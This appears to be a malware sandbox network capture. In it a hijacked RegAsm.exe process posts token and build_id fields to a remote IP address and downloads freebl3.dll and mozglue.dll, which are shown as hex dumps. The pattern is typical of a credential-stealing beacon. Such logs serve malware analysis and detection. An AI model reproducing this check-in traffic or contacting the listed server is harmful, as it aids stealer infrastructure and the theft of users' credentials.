                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:07 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 437
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------EHIJDHCAKKFCBGCBAAECCont
                                                                                                                                                                                                                                      2024-04-23 19:44:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.64971695.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:08 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJ
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 437
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:08 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IDHIIJJJKEGIDGCBAFIJCont
                                                                                                                                                                                                                                      2024-04-23 19:44:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.64971795.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:09 UTC157OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:10 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 685392
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                      Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                      Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                      Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                      Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                      Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                      Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                      Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                      Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                      2024-04-23 19:44:10 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                      Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.64971895.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:11 UTC157OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:12 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 608080
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                      Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                      Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                      2024-04-23 19:44:12 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                      Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
